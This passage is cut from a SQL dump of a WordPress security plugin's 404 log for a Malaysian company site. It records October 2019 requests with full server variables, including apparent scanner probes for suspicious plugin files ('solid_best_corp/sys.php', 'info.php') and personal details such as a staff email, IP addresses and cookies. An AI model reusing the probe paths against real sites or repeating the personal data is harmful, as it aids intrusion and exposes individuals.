18:11:15',35425432,37231688,'https://bintara.com.my/?page_id=18',1,0,'209.99.136.105'),(28031,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/productph/404.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=077bd88870c9c7e30f5eea3a14c839fb\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:41:\"http://bintara.com.my//productph//404.asp\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/productph/404.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/productph/404.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaSNnmfO-tVFZ234mVhbxgAAAAg\";s:12:\"REDIRECT_URL\";s:18:\"/productph/404.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52777\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/productph/404.asp\";s:10:\"SCRIPT_URL\";s:18:\"/productph/404.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaSNnmfO-tVFZ234mVhbxgAAAAg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571065246.5203\";s:12:\"REQUEST_TIME\";s:10:\"1571065246\";}}','notice','2019-10-14 15:00:48','2019-10-14 15:00:46',35026328,36828480,'https://bintara.com.my/productph/404.asp',1,0,'103.115.42.42'),(28027,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"0A1E47EF-CC70-4DFB-86B0-12DD7604C04B\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaRg@WfO-tVFZ234mVhDaQAAABU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"54015\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaRg@WfO-tVFZ234mVhDaQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571053817.7111\";s:12:\"REQUEST_TIME\";s:10:\"1571053817\";}}','notice','2019-10-14 11:50:20','2019-10-14 11:50:18',35737408,37531256,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(28026,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571050935.7318089008331298828125\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571050935.7318089008331298828125\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571050935.7318089008331298828125\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571050935.7318089008331298828125\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"57974\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571050935.7318089008331298828125\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaRVt2fO-tVFZ234mVg@CAAAAAs\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaRVt2fO-tVFZ234mVg@CAAAAAs\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"57974\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaRVt2fO-tVFZ234mVg@CAAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571051843.1307\";s:12:\"REQUEST_TIME\";s:10:\"1571051843\";}}','notice','2019-10-14 11:17:42','2019-10-14 11:17:27',35057128,35310552,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571050935.7318089008331298828125',1,0,'103.6.198.69'),(28129,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.128.136\";s:11:\"REMOTE_PORT\";s:5:\"52021\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaboBD@QAlIeaTAl5H-N2gAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571219460.5713\";s:12:\"REQUEST_TIME\";s:10:\"1571219460\";}}','notice','2019-10-16 09:51:04','2019-10-16 09:51:01',35427136,37231320,'https://bintara.com.my/?page_id=18',1,0,'108.161.128.136'),(28128,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:53:\"/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XabnTz@QAlIeaTAl5H-NMwAAAEw\";s:19:\"REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:53:\"/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XabnTz@QAlIeaTAl5H-NMwAAAEw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"43794\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:75:\"https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:53:\"/wordpress/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XabnTz@QAlIeaTAl5H-NMwAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571219279.1057\";s:12:\"REQUEST_TIME\";s:10:\"1571219279\";}}','notice','2019-10-16 09:48:01','2019-10-16 09:47:59',35055800,36862472,'https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/sys.php',1,0,'151.80.54.15'),(28127,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:54:\"/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:54:\"/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XabnKz@QAlIeaTAl5H-NJAAAAEU\";s:19:\"REDIRECT_SCRIPT_URI\";s:76:\"https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:54:\"/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XabnKz@QAlIeaTAl5H-NJAAAAEU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"34398\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:76:\"https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:54:\"/wordpress/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XabnKz@QAlIeaTAl5H-NJAAAAEU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571219243.8757\";s:12:\"REQUEST_TIME\";s:10:\"1571219243\";}}','notice','2019-10-16 09:47:26','2019-10-16 09:47:24',35281680,37081304,'https://bintara.com.my/wordpress/wp-content/plugins/solid_best_corp/info.php',1,0,'151.80.54.15'),(28126,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{700A50D1-5AB3-478F-B315-9F048EDBB95D}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=5a6f20c63ec886158c93837c0eb09c85\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3E8A463F-88E9-49A0-8260-899E887B2B01\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XabmstwSqwmg3BSzc7-UmAAAAg8\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.82.210.214\";s:11:\"REMOTE_PORT\";s:5:\"42316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XabmstwSqwmg3BSzc7-UmAAAAg8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571219122.9982\";s:12:\"REQUEST_TIME\";s:10:\"1571219122\";}}','notice','2019-10-16 09:45:25','2019-10-16 